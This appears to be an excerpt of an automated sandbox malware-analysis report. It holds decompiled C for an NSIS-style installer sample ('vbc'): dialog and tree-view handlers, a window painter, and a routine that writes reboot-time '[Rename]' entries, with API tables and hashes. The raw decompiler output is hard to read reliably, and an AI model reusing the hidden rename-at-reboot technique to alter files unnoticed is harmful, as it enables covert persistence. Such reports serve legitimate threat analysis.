											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageW(_v8, 0x113f, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t292 =  &(_t292[0x206]);
									} while (_v24 <  *0x7a8acc);
									goto L86;
								} else {
									_t293 = E004012E2( *0x7a1f80);
									E00401299(_t293);
									_t222 = 0;
									_t301 = 0;
									if(_t293 <= 0) {
										L74:
										SendMessageW(_v12, 0x14e, _t301, 0);
										_a16 = _t293;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
											_t301 = _t301 + 1;
										}
										_t222 = _t222 + 1;
									} while (_t222 < _t293);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t232 = SendMessageW(_v12, 0x147, 0, 0);
							if(_t232 == 0xffffffff) {
								goto L93;
							}
							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
								_t294 = 0x20;
							}
							E00401299(_t294);
							SendMessageW(_a4, 0x420, 0, _t294);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					_v20 = 2;
					 *0x7a8b00 = _t291;
					 *0x7a1f80 = GlobalAlloc(0x40,  *0x7a8acc << 2);
					_t258 = LoadImageW( *0x7a8aa0, 0x6e, 0, 0, 0, 0);
					 *0x7a1f74 =  *0x7a1f74 | 0xffffffff;
					_t297 = _t258;
					 *0x7a1f7c = SetWindowLongW(_v8, 0xfffffffc, E00405644);
					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x7a1f6c = _t260;
					ImageList_AddMasked(_t260, _t297, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x7a1f6c);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t297);
					_t298 = 0;
					do {
						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
							if(_t298 != 0x20) {
								_v20 = 0;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E004066AB(_t298, 0, _t326, 0, _t266)), _t298);
						}
						_t298 = _t298 + 1;
					} while (_t298 < 0x21);
					_t299 = _a16;
					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
					_push(0x15);
					E004045CA(_a4);
					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
					_push(0x16);
					E004045CA(_a4);
					_t300 = 0;
					_v16 = 0;
					if( *0x7a8acc <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t319 = _v24 + 8;
						_v32 = _t319;
						do {
							_t278 =  &(_t319[0x10]);
							if( *_t278 != 0) {
								_v64 = _t278;
								_t279 =  *_t319;
								_v88 = _v16;
								_t311 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t311;
								_v44 = _t300;
								_v72 = _t279 & _t311;
								if((_t279 & 0x00000002) == 0) {
									if((_t279 & 0x00000004) == 0) {
										 *( *0x7a1f80 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
									} else {
										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
									_v36 = 1;
									 *( *0x7a1f80 + _t300 * 4) = _t284;
									_v16 =  *( *0x7a1f80 + _t300 * 4);
								}
							}
							_t300 = _t300 + 1;
							_t319 =  &(_v32[0x818]);
							_v32 = _t319;
						} while (_t300 <  *0x7a8acc);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E004045FF(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004045FF(_v12);
								L93:
								return E00404631(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x0040503e
0x00405057
0x0040505c
0x00405064
0x0040506a
0x00405080
0x00405083
0x004052ae
0x004052b5
0x004052c9
0x004052b7
0x004052b9
0x004052bc
0x004052bd
0x004052c4
0x004052c4
0x004052d5
0x004052e3
0x004052e6
0x004052fc
0x00405371
0x00405374
0x00405376
0x00405380
0x0040538e
0x0040538e
0x00405390
0x0040539a
0x004053a0
0x004053a3
0x004053a6
0x004053c1
0x004053a8
0x004053b2
0x004053b2
0x004053a6
0x0040539a
0x00000000
0x00405374
0x00405301
0x0040530c
0x00405311
0x00405318
0x0040531d
0x00405321
0x0040532c
0x0040532c
0x00405330
0x00405334
0x00405338
0x0040534b
0x0040533a
0x0040533a
0x00405341
0x00405347
0x00405343
0x00405343
0x00405343
0x00405341
0x0040534f
0x00405351
0x00405364
0x00405367
0x0040536a
0x0040536a
0x00405334
0x00000000
0x00405321
0x00405303
0x0040530a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004053c4
0x004053c4
0x004053cb
0x0040543c
0x00405444
0x0040544c
0x0040544c
0x00405455
0x00405457
0x0040545e
0x00405461
0x00405461
0x00405467
0x0040546e
0x00405471
0x00405471
0x00405477
0x0040547d
0x00405483
0x00405483
0x00405490
0x004055f1
0x004055f8
0x00405615
0x0040561b
0x0040562d
0x0040562d
0x00000000
0x00405496
0x00405498
0x0040549d
0x004054a2
0x004054a7
0x004054a9
0x004054a9
0x004054aa
0x004054ab
0x004054ad
0x004054ad
0x004054b5
0x004054f6
0x004054f8
0x00405508
0x0040550b
0x00405510
0x00405517
0x0040551a
0x004055bc
0x004055c5
0x004055cd
0x004055cd
0x004055db
0x004055ec
0x004055ec
0x00000000
0x004055db
0x00405520
0x00405523
0x00405529
0x0040552e
0x00405530
0x00405532
0x00405538
0x0040553f
0x00405544
0x0040554b
0x0040554e
0x0040554e
0x00405555
0x00405561
0x00405565
0x00405567
0x00405567
0x00405557
0x00405559
0x00405559
0x00405587
0x00405593
0x004055a2
0x004055a2
0x004055a4
0x004055a7
0x004055b0
0x00000000
0x004054b7
0x004054c2
0x004054c5
0x004054ca
0x004054cc
0x004054d0
0x004054e0
0x004054ea
0x004054ec
0x004054ef
0x00000000
0x00000000
0x00000000
0x00000000
0x004054d2
0x004054d2
0x004054d8
0x004054da
0x004054da
0x004054db
0x004054dc
0x00000000
0x004054d2
0x004054b5
0x00405490
0x004053d3
0x00000000
0x004053e9
0x004053f3
0x004053f8
0x00000000
0x00000000
0x0040540a
0x0040540f
0x0040541b
0x0040541b
0x0040541d
0x0040542c
0x0040542e
0x00405432
0x00405435
0x00000000
0x00405435
0x004053d3
0x00405089
0x0040508e
0x00405097
0x0040509e
0x004050b0
0x004050bb
0x004050c1
0x004050cf
0x004050e3
0x004050e8
0x004050f5
0x004050fa
0x00405110
0x00405121
0x0040512e
0x0040512e
0x00405131
0x00405137
0x00405139
0x0040513c
0x00405141
0x00405146
0x00405148
0x00405148
0x00405168
0x00405168
0x0040516a
0x0040516b
0x00405170
0x00405176
0x0040517a
0x0040517f
0x00405187
0x0040518b
0x00405190
0x00405195
0x0040519d
0x004051a0
0x00405270
0x00405283
0x00000000
0x004051a6
0x004051a9
0x004051ac
0x004051af
0x004051af
0x004051b5
0x004051be
0x004051c1
0x004051c5
0x004051c8
0x004051cb
0x004051d4
0x004051dd
0x004051e0
0x004051e3
0x004051e6
0x00405224
0x0040524f
0x00405226
0x00405235
0x00405235
0x004051e8
0x004051eb
0x004051f9
0x00405203
0x0040520b
0x00405212
0x0040521d
0x0040521d
0x004051e6
0x00405255
0x00405256
0x00405262
0x00405262
0x0040526e
0x00405289
0x0040528c
0x004052a9
0x00000000
0x0040528e
0x00405293
0x0040529c
0x0040562f
0x00405641
0x00405641
0x0040528c
0x00000000
0x0040526e
0x004051a0

APIs

GetDlgItem.USER32(?,000003F9), ref: 0040504F
GetDlgItem.USER32(?,00000408), ref: 0040505A
GlobalAlloc.KERNEL32(00000040,?), ref: 004050A4
LoadImageW.USER32 ref: 004050BB
SetWindowLongW.USER32 ref: 004050D4
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E8
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050FA
SendMessageW.USER32(?,00001109,00000002), ref: 00405110
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 0040511C
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 0040512E
DeleteObject.GDI32(00000000), ref: 00405131
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040515C
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405168
SendMessageW.USER32(?,00001132,00000000,?), ref: 00405203
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405233

Part of subcall function 004045FF: SendMessageW.USER32(00000028,?,00000001,0040442A), ref: 0040460D

SendMessageW.USER32(?,00001132,00000000,?), ref: 00405247
GetWindowLongW.USER32(?,000000F0), ref: 00405275
SetWindowLongW.USER32 ref: 00405283
ShowWindow.USER32(?,00000005), ref: 00405293
SendMessageW.USER32(?,00000419,00000000,?), ref: 0040538E
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053F3
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405408
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 0040542C
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040544C
ImageList_Destroy.COMCTL32(?), ref: 00405461
GlobalFree.KERNEL32(?), ref: 00405471
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054EA
SendMessageW.USER32(?,00001102,?,?), ref: 00405593
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004055A2
InvalidateRect.USER32(?,00000000,00000001), ref: 004055CD
ShowWindow.USER32(?,00000000), ref: 0040561B
GetDlgItem.USER32(?,000003FE), ref: 00405626
ShowWindow.USER32(00000000), ref: 0040562D

Strings

M, xrefs: 004051EB
N, xrefs: 004052CC
, xrefs: 00405605

Memory Dump Source

Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: 6abe7a227f943e402f923de28771de89d858ca3350371f72f3cd38ce524b5995
Instruction ID: 1c888212402988323542b136e78769e30209d338b2ecbb40b03ff66d659fa363
Opcode Fuzzy Hash: 6abe7a227f943e402f923de28771de89d858ca3350371f72f3cd38ce524b5995
Instruction Fuzzy Hash: 25027A70900609EFDB20DFA5CD85AAF7BB5FB85314F10812AF611BA2E1DB798951CF18

Uniqueness

Uniqueness Score: -1.00%

Function 00404789 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00404789(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				char _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x79ff54 =  *0x79ff54 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E00404631(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x7a6a40;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								_t44 =  &_v8; // 0x7a6a40
								E00404A38(_a4,  *_t44);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x7a8aa8, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x7a8aa8, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x79ff54 != 0) {
						goto L27;
					} else {
						_t116 =  *0x7a0f60 + 0x14;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004045EC(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404A14();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t75 =  *( *0x7a7a7c - 4 + _t75 * 4);
				}
				_t76 =  *0x7a8ad8 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E0040473A;
				if(_t110 != 2) {
					_v8 = E00404700;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E004045CA(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E004045CA(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E004045EC( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E004045FF(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x7a8ab0 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x79ff54 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x79ff54 = 0;
				return 0;
			}

0x0040479b
0x004048c8
0x00404925
0x00404929
0x004049f6
0x004049f8
0x004049f8
0x004049fe
0x004049fe
0x00404a01
0x00000000
0x00404a08
0x00404937
0x0040493d
0x00404947
0x00404952
0x00404955
0x00404958
0x00404963
0x00404966
0x0040496d
0x0040497a
0x0040498b
0x00404991
0x00404993
0x00404999
0x004049a7
0x004049ad
0x004049ad
0x0040496d
0x004049b7
0x00000000
0x004049c2
0x004049c6
0x004049d6
0x004049d6
0x004049dc
0x004049e8
0x004049e8
0x00000000
0x004049ec
0x004049b7
0x004048d3
0x00000000
0x004048e5
0x004048ea
0x004048f0
0x00000000
0x00000000
0x00404919
0x0040491b
0x00404920
0x00000000
0x00404920
0x004048d3
0x004047a1
0x004047a4
0x004047a9
0x004047ba
0x004047ba
0x004047c2
0x004047c5
0x004047c9
0x004047cc
0x004047d0
0x004047d3
0x004047d6
0x004047d9
0x004047e0
0x004047e2
0x004047e2
0x004047ec
0x004047f9
0x00404803
0x00404808
0x0040480b
0x00404810
0x00404827
0x0040482e
0x00404841
0x00404844
0x00404858
0x0040485f
0x00404864
0x00404869
0x00404869
0x00404877
0x00404885
0x00404897
0x0040489c
0x004048ac
0x004048ae
0x00000000

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404827
GetDlgItem.USER32(?,000003E8), ref: 0040483B
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404858
GetSysColor.USER32 ref: 00404869
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404877
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404885
lstrlenW.KERNEL32(?), ref: 0040488A
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404897
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048AC
GetDlgItem.USER32(?,0000040A), ref: 00404905
SendMessageW.USER32(00000000), ref: 0040490C
GetDlgItem.USER32(?,000003E8), ref: 00404937
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040497A
LoadCursorW.USER32 ref: 00404988
SetCursor.USER32(00000000), ref: 0040498B
LoadCursorW.USER32 ref: 004049A4
SetCursor.USER32(00000000), ref: 004049A7
SendMessageW.USER32(00000111,00000001,00000000), ref: 004049D6
SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E8

Strings

@jz, xrefs: 00404993
N, xrefs: 00404925

Memory Dump Source

Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: @jz$N
API String ID: 3103080414-4087404676
Opcode ID: 2f7aa64e3dc70d49155a5c32c4c6c2cb2c3818e72aa53dab6a0d1c61e372e6f3
Instruction ID: a92c684f90d09e790cb96c84d129e3e4002e0b0c6609d0ca9bf02dd30757374c
Opcode Fuzzy Hash: 2f7aa64e3dc70d49155a5c32c4c6c2cb2c3818e72aa53dab6a0d1c61e372e6f3
Instruction Fuzzy Hash: D861A2B1900209BFDB109F61DD85AAA7BA9FB85315F00803AF705B62E1C77C9D51DF98

Uniqueness

Uniqueness Score: -1.00%

Function 004062B4 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004062B4(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x7a5628 = 0x55004e;
				 *0x7a562c = 0x4c;
				if(_t44 == 0) {
					L3:
					_t2 = _t52 + 0x1c; // 0x7a5e28
					_t12 = GetShortPathNameW( *_t2, 0x7a5e28, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x7a5228, "%ls=%ls\r\n", 0x7a5628, 0x7a5e28);
						_t53 = _t52 + 0x10;
						E004066AB(_t37, 0x400, 0x7a5e28, 0x7a5e28,  *((intOrPtr*)( *0x7a8ab0 + 0x128)));
						_t12 = E0040615E(0x7a5e28, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E004061E1(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E004060C3(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E004060C3(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00406119(_t24 + _t46, 0x7a5228, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E00406210(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E0040615E(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x7a5628, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}

0x004062b4
0x004062bd
0x004062c4
0x004062ce
0x004062e2
0x0040630a
0x00406311
0x00406315
0x00406319
0x00406339
0x00406340
0x0040634a
0x00406357
0x0040635c
0x00406361
0x00406365
0x00406374
0x00406376
0x00406383
0x00406387
0x00406422
0x00000000
0x0040639d
0x004063aa
0x004063ce
0x004063d2
0x004063f1
0x004063f5
0x004063f5
0x004063f7
0x00406400
0x0040640b
0x00406416
0x0040641c
0x00000000
0x0040641c
0x004063d4
0x004063d7
0x004063e2
0x004063de
0x004063e0
0x004063e1
0x004063e1
0x004063e9
0x004063eb
0x00000000
0x004063eb
0x004063b5
0x004063bb
0x00000000
0x004063bb
0x00406387
0x00406365
0x004062e4
0x004062ef
0x004062f8
0x004062fc
0x00000000
0x00000000
0x004062fc
0x0040642d

APIs

CloseHandle.KERNEL32(00000000), ref: 004062EF
GetShortPathNameW.KERNEL32 ref: 004062F8

Part of subcall function 004060C3: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060D3
Part of subcall function 004060C3: lstrlenA.KERNEL32(00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406105

GetShortPathNameW.KERNEL32 ref: 00406315
wsprintfA.USER32 ref: 00406333
GetFileSize.KERNEL32(00000000,00000000,007A5E28,C0000000,00000004,007A5E28,?,?,?,?,?), ref: 0040636E
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 0040637D
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063B5
SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,007A5228,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 0040640B
GlobalFree.KERNEL32(00000000), ref: 0040641C
CloseHandle.KERNEL32(00000000), ref: 00406423

Part of subcall function 0040615E: GetFileAttributesW.KERNELBASE(00000003,00403113,007B6800,80000000,00000003), ref: 00406162
Part of subcall function 0040615E: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406184

Strings

%ls=%ls, xrefs: 00406329
(^z, xrefs: 00406311
(^z, xrefs: 0040630A
(Vz, xrefs: 004062DD
[Rename], xrefs: 0040639D, 004063AF

Memory Dump Source

Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$(Vz$(^z$(^z$[Rename]
API String ID: 2171350718-2000197835
Opcode ID: 88b5ac268f0a1f1c2fdae64f0923303a12147287a2ba527380340a6ee5c0cda9
Instruction ID: 6cadb61bc7003589c9facc341004653e1fa6c0793f9c109ef5d6a16b2289e69d
Opcode Fuzzy Hash: 88b5ac268f0a1f1c2fdae64f0923303a12147287a2ba527380340a6ee5c0cda9
Instruction Fuzzy Hash: 2D313571600705BBD2206B669D48F1B3A9CEF85714F16003EFD42FA2C2DA7DD82586BD

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x7a8ab0;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x7a7aa0, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x7a8aa8;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
